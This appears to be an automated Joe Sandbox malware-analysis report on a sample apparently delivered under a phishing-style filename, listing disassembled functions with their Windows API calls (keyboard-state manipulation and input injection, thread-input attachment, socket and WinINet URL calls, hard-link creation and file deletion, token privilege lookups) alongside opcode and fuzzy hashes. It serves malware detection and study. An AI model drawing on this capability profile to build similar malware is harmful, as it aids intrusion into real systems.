Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: Variant$AllocClearCopyInitString
String ID:
API String ID: 2808897238-0
Opcode ID: 909f57f2d0f4508fd02deaf7429027c0ef24f049562914b2300432d837aede87
Instruction ID: 3d35cd3cafcdb0c0e21a44a577809aa664913a70a6b1343e73cf6566270fa766
Opcode Fuzzy Hash: 909f57f2d0f4508fd02deaf7429027c0ef24f049562914b2300432d837aede87
Instruction Fuzzy Hash: 3951C730B083029BDB24AF66D895B7EF7E5AF48710F20891FE656CB2D1DB70A854DB11

Uniqueness

Uniqueness Score: -1.00%

Function 00C39A63 Relevance: 6.1, APIs: 4, Instructions: 140COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(01580520,?), ref: 00C39AD2
ScreenToClient.USER32(00000002,00000002), ref: 00C39B05
MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00C39B72

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: 64aa6d1e3a3261b4b86caf37814adff34c7bae55842117811b6ff916537cc218
Instruction ID: 7b14da296837646763e2b6049026554f45436804d23e02237705380c239afe1b
Opcode Fuzzy Hash: 64aa6d1e3a3261b4b86caf37814adff34c7bae55842117811b6ff916537cc218
Instruction Fuzzy Hash: A4515334A10609EFCF24DF58D881AAE7BF5FF45324F148659F8259B2A0D770AE81DB50

Uniqueness

Uniqueness Score: -1.00%

Function 00C26CBD Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000002,00000011), ref: 00C26CE4
WSAGetLastError.WSOCK32(00000000), ref: 00C26CF4

Part of subcall function 00BB9997: __itow.LIBCMT ref: 00BB99C2
Part of subcall function 00BB9997: __swprintf.LIBCMT ref: 00BB9A0C

#21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00C26D58
WSAGetLastError.WSOCK32(00000000), ref: 00C26D64

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: ErrorLast$__itow__swprintfsocket
String ID:
API String ID: 2214342067-0
Opcode ID: fcc69a69201ef80ebe0d57af9be821c667e5d5542301c03c30fca72d6758ba28
Instruction ID: e26d0a9d76849a4cf0b26f3868cad85fa7bcd6bad45226c10e83f8c18aeee253
Opcode Fuzzy Hash: fcc69a69201ef80ebe0d57af9be821c667e5d5542301c03c30fca72d6758ba28
Instruction Fuzzy Hash: DF419374740210AFEB20AF24DC86F7E77E99B04B10F448458FA59AB2D2DBB19D01C791

Uniqueness

Uniqueness Score: -1.00%

Function 00C2672D Relevance: 6.1, APIs: 4, Instructions: 116COMMON

Download Yara Rule

APIs

#16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,00C3F910), ref: 00C267BA
_strlen.LIBCMT ref: 00C267EC

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: _strlen
String ID:
API String ID: 4218353326-0
Opcode ID: d7ae64beae6fd9ccba82db15b34e3698992a093c2740f09d7f4d9ecac9e052bb
Instruction ID: e2377b8a0458467e3cf9bb36be4c688a04ab2bbe2f19b848d3a7f89d69953964
Opcode Fuzzy Hash: d7ae64beae6fd9ccba82db15b34e3698992a093c2740f09d7f4d9ecac9e052bb
Instruction Fuzzy Hash: 7B419F31A00114ABCB14EBA4ECC1FFEB7E9AF48310F1481A9F926972D2DB70AD14D761

Uniqueness

Uniqueness Score: -1.00%

Function 00C1BA5F Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00C1BB09
GetLastError.KERNEL32(?,00000000), ref: 00C1BB2F
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00C1BB54
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00C1BB80

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: 24987ca17f7160be60e2ae148ea2ea43a35f8024ef2c950bfc7e722097c1c225
Instruction ID: cd16a054f56761998ff5f28de993d682ec9d4a711e2545f0ef7ca7d58ac10a60
Opcode Fuzzy Hash: 24987ca17f7160be60e2ae148ea2ea43a35f8024ef2c950bfc7e722097c1c225
Instruction Fuzzy Hash: 34413A39600610DFCB11EF15C584AADBBE1EF4A310B098498FD8AAB762CB74FD41DB91

Uniqueness

Uniqueness Score: -1.00%

Function 00C38AC0 Relevance: 6.1, APIs: 4, Instructions: 109COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00C38B4D

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: acac9d135001cc9fca58aae71f7683a1bca6a0a3a8f105aca7a4bdae838b5b11
Instruction ID: f57aa2b57e40021c4bb0602e1eadde8f9b6c8617d808545f257ca91623e2eaa5
Opcode Fuzzy Hash: acac9d135001cc9fca58aae71f7683a1bca6a0a3a8f105aca7a4bdae838b5b11
Instruction Fuzzy Hash: 2D31DBB4620305BFEF249F28CC85FADB7A4EB05354F244516F665D72E1CF30AA489B51

Uniqueness

Uniqueness Score: -1.00%

Function 00C3ADF1 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 00C3AE1A
GetWindowRect.USER32(?,?), ref: 00C3AE90
PtInRect.USER32(?,?,00C3C304), ref: 00C3AEA0
MessageBeep.USER32(00000000), ref: 00C3AF11

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: 5e1e77d0166387ab478ec0d813dc97bd10569d459e7a3dda21e17b991084611b
Instruction ID: a3a4f6c3c584781d5369e619dce95f06446676e039697e595b7440a67ee4e2b3
Opcode Fuzzy Hash: 5e1e77d0166387ab478ec0d813dc97bd10569d459e7a3dda21e17b991084611b
Instruction Fuzzy Hash: 04416E70A10119DFCB11CF59C884BAD7BF5FB49350F1881A9E4A89B251D730A962DF92

Uniqueness

Uniqueness Score: -1.00%

Function 00C10FE6 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00C11037
SetKeyboardState.USER32(00000080,?,00000001), ref: 00C11053
PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00C110B9
SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00C1110B

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 2f0bfe45796b968187324d7e88feef3f19c86ad01760440d7f9c46193f39c162
Instruction ID: 6a17d163e5956f58f623340735f671418c8e1d3feb75cb04c36aeecdf4a9a9be
Opcode Fuzzy Hash: 2f0bfe45796b968187324d7e88feef3f19c86ad01760440d7f9c46193f39c162
Instruction Fuzzy Hash: 27314D30E44698AEFF308B668C057FDBBA5AB4F310F1C425AEAA0521D1C37C8AD5B751

Uniqueness

Uniqueness Score: -1.00%

Function 00C11121 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,76C1C0D0,?,00008000), ref: 00C11176
SetKeyboardState.USER32(00000080,?,00008000), ref: 00C11192
PostMessageW.USER32(00000000,00000101,00000000), ref: 00C111F1
SendInput.USER32(00000001,?,0000001C,76C1C0D0,?,00008000), ref: 00C11243

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 5b5e79beda627d3d259fada4644aba58667f3f90a2476fd0ead7dde37c35a1bd
Instruction ID: 9273e75ab04784c90a777813c77d62162eda011b7314bf0faf33e2ccb25adbb1
Opcode Fuzzy Hash: 5b5e79beda627d3d259fada4644aba58667f3f90a2476fd0ead7dde37c35a1bd
Instruction Fuzzy Hash: 3D313B30E406086AFF318A6588047FEBB6AAB47310F2C475AEB60911D1D37C4AD5B751

Uniqueness

Uniqueness Score: -1.00%

Function 00BE6415 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00BE644B
__isleadbyte_l.LIBCMT ref: 00BE6479
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00BE64A7
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00BE64DD

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: be4809bb1bf1ff24302325d47b169b4bf25632ff0026d623dffc0c7a448bd3b4
Instruction ID: b1c0b277f81f5d64c814a0a2dea597a1c79c8ec70669c4b36579611fff02e9a5
Opcode Fuzzy Hash: be4809bb1bf1ff24302325d47b169b4bf25632ff0026d623dffc0c7a448bd3b4
Instruction Fuzzy Hash: D031C13160028AAFDB218F66C845BAA7BF5FF60390F1544A9E854872D1E731D951DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00C35175 Relevance: 6.1, APIs: 4, Instructions: 95COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00C35189

Part of subcall function 00C1387D: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00C13897
Part of subcall function 00C1387D: GetCurrentThreadId.KERNEL32 ref: 00C1389E
Part of subcall function 00C1387D: AttachThreadInput.USER32(00000000,?,00C152A7), ref: 00C138A5

GetCaretPos.USER32(?), ref: 00C3519A
ClientToScreen.USER32(00000000,?), ref: 00C351D5
GetForegroundWindow.USER32 ref: 00C351DB

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: 8c5e042e6a119181e2b5e772612ff3c58bb924e03dca486e0640a50bcc1779a4
Instruction ID: bdbca0b2506eb1eccb8a37b34786551338641de8454e51e046141cde6b8b33a2
Opcode Fuzzy Hash: 8c5e042e6a119181e2b5e772612ff3c58bb924e03dca486e0640a50bcc1779a4
Instruction Fuzzy Hash: 78312D72D10108AFDB00EFA5C885AEFB7F9EF99300F1044AAE515E7251EA759E45CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00C3C788 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00BB2612: GetWindowLongW.USER32(?,000000EB), ref: 00BB2623

GetCursorPos.USER32(?), ref: 00C3C7C2
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00BEBBFB,?,?,?,?,?), ref: 00C3C7D7
GetCursorPos.USER32(?), ref: 00C3C824
DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00BEBBFB,?,?,?), ref: 00C3C85E

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: 254302b27be8fd2f54cd53ba82ca432ff37b4e0d6a51c6ce6f9006334a2a3572
Instruction ID: ef36ebef6cb09f252d7497d20d96983a34cd0dd7169b6d3d1dd1715a3e563c85
Opcode Fuzzy Hash: 254302b27be8fd2f54cd53ba82ca432ff37b4e0d6a51c6ce6f9006334a2a3572
Instruction Fuzzy Hash: 6A317C35610018AFCB25CF59C8D8FEE7BBAEB49310F0440A9F9199B2A1C7359E51DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00C08B9E Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00C08652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00C08669
Part of subcall function 00C08652: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00C08673
Part of subcall function 00C08652: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00C08682
Part of subcall function 00C08652: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00C08689
Part of subcall function 00C08652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00C0869F

LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00C08BEB
_memcmp.LIBCMT ref: 00C08C0E
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C08C44
HeapFree.KERNEL32(00000000), ref: 00C08C4B

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
String ID:
API String ID: 1592001646-0
Opcode ID: a5633ac0d50208db3809f6b0b2392e87ebe44abb423ab490d0d99681dc751a82
Instruction ID: 7cd8f5233d0ed0f98254a78105585a69d3b0e79affc60c8638193454099a9f46
Opcode Fuzzy Hash: a5633ac0d50208db3809f6b0b2392e87ebe44abb423ab490d0d99681dc751a82
Instruction Fuzzy Hash: B321A171E01208EFDB00CF94C944BEEB7B8FF40340F048059E5A5A7280DB31AE0ACB60

Uniqueness

Uniqueness Score: -1.00%

Function 00BD0BD0 Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

APIs

__setmode.LIBCMT ref: 00BD0BF2

Part of subcall function 00BB5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00C17B20,?,?,00000000), ref: 00BB5B8C
Part of subcall function 00BB5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00C17B20,?,?,00000000,?,?), ref: 00BB5BB0

_fprintf.LIBCMT ref: 00BD0C29
OutputDebugStringW.KERNEL32(?), ref: 00C06331

Part of subcall function 00BD4CDA: _flsall.LIBCMT ref: 00BD4CF3

__setmode.LIBCMT ref: 00BD0C5E

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
String ID:
API String ID: 521402451-0
Opcode ID: d9c5414031378f5a38db0ceade3f53f24713bcb48c91ed65f848fae3023d89f7
Instruction ID: eb491b8bfe923f67efb41b457dbacb891212060750de5470f172fbdd6108d85c
Opcode Fuzzy Hash: d9c5414031378f5a38db0ceade3f53f24713bcb48c91ed65f848fae3023d89f7
Instruction Fuzzy Hash: 751127319042046FCB0477B49C82AFEBBE9DF41320F18019BF204972D2EF715D859795

Uniqueness

Uniqueness Score: -1.00%

Function 00C21A5B Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00C21A97

Part of subcall function 00C21B21: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00C21B40
Part of subcall function 00C21B21: InternetCloseHandle.WININET(00000000), ref: 00C21BDD

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: Internet$CloseConnectHandleOpen
String ID:
API String ID: 1463438336-0
Opcode ID: 7fd0bf231e1e50d9aee875a8d8a7f2622b5bed4acf26c3675c87e0691fa3393c
Instruction ID: d86f984bbf8cb19d6677ff1db1727853d0166f5dcc0ed6a7209523b20a3d478b
Opcode Fuzzy Hash: 7fd0bf231e1e50d9aee875a8d8a7f2622b5bed4acf26c3675c87e0691fa3393c
Instruction Fuzzy Hash: D6210171200610BFDB119F60EC00FBAB7BDFF64700F18001AFE1196A60EB31D911ABA0

Uniqueness

Uniqueness Score: -1.00%

Function 00C0E1AF Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00C0F5AD: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00C0E1C4,?,?,?,00C0EFB7,00000000,000000EF,00000119,?,?), ref: 00C0F5BC
Part of subcall function 00C0F5AD: lstrcpyW.KERNEL32(00000000,?), ref: 00C0F5E2
Part of subcall function 00C0F5AD: lstrcmpiW.KERNEL32(00000000,?,00C0E1C4,?,?,?,00C0EFB7,00000000,000000EF,00000119,?,?), ref: 00C0F613

lstrlenW.KERNEL32(?,00000002,?,?,?,?,00C0EFB7,00000000,000000EF,00000119,?,?,00000000), ref: 00C0E1DD
lstrcpyW.KERNEL32(00000000,?), ref: 00C0E203
lstrcmpiW.KERNEL32(00000002,cdecl,?,00C0EFB7,00000000,000000EF,00000119,?,?,00000000), ref: 00C0E237

Strings

cdecl, xrefs: 00C0E22E

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: ca1cd46b94f1a2407a613b2c7893a12da84f42622f6a690db8846efd4ff0eff3
Instruction ID: b60f15dde9485a4e34cd20bfbe0a53f7f0d99491d64bcf2332171099ad52beee
Opcode Fuzzy Hash: ca1cd46b94f1a2407a613b2c7893a12da84f42622f6a690db8846efd4ff0eff3
Instruction Fuzzy Hash: CB119D3A210345EFCB25AF64DC45E7A77B8FF85350B40842AF816CB2A0EB719991D7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00BE5332 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00BE5351

Part of subcall function 00BD594C: __FF_MSGBANNER.LIBCMT ref: 00BD5963
Part of subcall function 00BD594C: __NMSG_WRITE.LIBCMT ref: 00BD596A
Part of subcall function 00BD594C: RtlAllocateHeap.NTDLL(01560000,00000000,00000001,00000000,?,?,?,00BD1013,?), ref: 00BD598F

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
